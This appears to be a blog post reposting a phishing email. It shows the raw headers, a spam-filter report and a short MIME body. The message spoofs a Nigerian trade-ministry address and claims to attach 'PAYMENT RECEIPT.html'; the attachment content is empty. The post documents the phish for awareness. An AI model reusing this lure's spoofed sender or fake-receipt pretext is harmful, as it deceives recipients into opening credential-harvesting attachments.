New Guinea phish
Posted by Dave Yadallee on
Return-path:
Envelope-to: dave@doctor.nl2k.ab.ca
Delivery-date: Sun, 22 Jan 2023 15:05:00 -0700
Received: from doctor by doctor.nl2k.ab.ca with local (Exim 4.96)
    (envelope-from)
    id 1pJiSK-000KNB-0c
    for dave@doctor.nl2k.ab.ca;
    Sun, 22 Jan 2023 15:04:52 -0700
Resent-From: The Doctor
Resent-Date: Sun, 22 Jan 2023 15:04:52 -0700
Resent-Message-ID:
Resent-To: Dave Yadallee
Received: from [139.59.21.214] (port=59710 helo=prhindia.co.in)
    by doctor.nl2k.ab.ca with esmtps (TLS1.3) tls TLS_AES_256_GCM_SHA384
    (Exim 4.96)
    (envelope-from)
    id 1pJdEY-0006mw-0T
    for root@nl2k.ab.ca;
    Sun, 22 Jan 2023 09:30:27 -0700
Received: from User (unknown [104.167.222.222])
    by prhindia.co.in (Postfix) with ESMTPA id 419F441038;
    Sun, 22 Jan 2023 21:33:40 +0530 (IST)
Authentication-Results: prhindia.co.in;
    spf=pass (sender IP is 104.167.222.222) smtp.mailfrom=tradeservices@trade.gov.ng smtp.helo=User
Received-SPF: pass (prhindia.co.in: connection is authenticated)
Reply-To:
From: "tradeservices@trade.gov.ng"
Subject: PAYMENT RECEIPT
Date: Sun, 22 Jan 2023 08:03:52 -0800
MIME-Version: 1.0
Content-Type: multipart/mixed;
    boundary="----=_NextPart_000_00B7_01C2A9A6.72ABD50A"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-Spam_score: 23.7
X-Spam_score_int: 237
X-Spam_bar: +++++++++++++++++++++++
X-Spam_report: Spam detection software, running on the system "doctor.nl2k.ab.ca",
has identified this incoming email as possible spam. The original
message has been attached to this so you can view it or label
similar future email. If you have any questions, see
@@CONTACT_ADDRESS@@ for details.
Content preview: THE PAYMENT RECEIPT IS ATTACHED.
Content analysis details: (23.7 points, 5.0 required)
 pts rule name              description
---- ---------------------- --------------------------------------------------
 0.1 MISSING_MID            Missing Message-Id: header
 3.6 RCVD_IN_SBL_CSS        RBL: Received via a relay in Spamhaus SBL-CSS
                            [104.167.222.222 listed in zen.spamhaus.org]
 1.3 RCVD_IN_VALIDITY_RPBL  RBL: Relay in Validity RPBL,
                            https://senderscore.org/blocklistlookup/
                            [139.59.21.214 listed in bl.score.senderscore.com]
 1.3 RCVD_IN_RP_RNBL        RBL: Relay in RNBL,
                            https://senderscore.org/blacklistlookup/
                            [139.59.21.214 listed in bl.score.senderscore.com]
 1.6 RCVD_IN_BRBL_LASTEXT   RBL: No description available.
                            [139.59.21.214 listed in bb.barracudacentral.org]
-0.2 RCVD_IN_MSPIKE_H2      RBL: Average reputation (+2)
                            [139.59.21.214 listed in wl.mailspike.net]
-0.0 SPF_HELO_PASS          SPF: HELO matches SPF record
 1.0 SPF_SOFTFAIL           SPF: sender does not match SPF record (softfail)
 0.0 NSL_RCVD_FROM_USER     Received from User
 1.2 MISSING_HEADERS        Missing To: header
 1.6 SUBJ_ALL_CAPS          Subject is all capitals
 0.0 T_OBFU_HTML_ATTACH     HTML attachment with non-text MIME type
 0.0 AXB_XMAILER_MIMEOLE_OL_024C2 Yet another X header trait
 0.0 FROM_MISSP_XPRIO       Misspaced FROM + X-Priority
 0.6 FSL_NEW_HELO_USER      Spam's using Helo and User
 0.0 FROM_MISSP_USER        From misspaced, from "User"
 0.0 T_HTML_ATTACH          HTML attachment to bypass scanning?
 0.0 OBFU_ATTACH_MISSP      Obfuscated attachment type and misspaced From
 0.0 FROM_MISSPACED         From: missing whitespace
 0.0 FROM_MISSP_MSFT        From misspaced + supposed Microsoft tool
 1.3 RDNS_NONE              Delivered to internal network by a host with no rDNS
 0.0 T_OBFU_ATTACH_MISSP    Obfuscated attachment type and misspaced From
 0.7 TO_NO_BRKTS_FROM_MSSP  Multiple formatting errors
 1.9 REPLYTO_WITHOUT_TO_CC  No description available.
 0.0 FROM_MISSP_REPLYTO     From misspaced, has Reply-To
 0.3 FROM_MISSP_EH_MATCH    From misspaced, matches envelope
 2.8 FORGED_MUA_OUTLOOK     Forged mail pretending to be from MS Outlook
 1.7 RAZOR2_CHECK           Listed in Razor2 (http://razor.sf.net/)
 0.4 RAZOR2_CF_RANGE_51_100 Razor2 gives confidence level above 50%
                            [cf: 100]
 2.4 RAZOR2_CF_RANGE_E8_51_100 Razor2 gives engine 8 confidence level
                            above 50%
                            [cf: 100]
 0.0 FSL_BULK_SIG           Bulk signature with no Unsubscribe
Subject: {SPAM?} PAYMENT RECEIPT

This is a multi-part message in MIME format.

------=_NextPart_000_00B7_01C2A9A6.72ABD50A
Content-Type: text/plain;
    charset="Windows-1251"
Content-Transfer-Encoding: 7bit

THE PAYMENT RECEIPT IS ATTACHED.

------=_NextPart_000_00B7_01C2A9A6.72ABD50A
Content-Type: application/octet-stream;
    name="PAYMENT RECEIPT.html"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
    filename="PAYMENT RECEIPT.html"

------=_NextPart_000_00B7_01C2A9A6.72ABD50A--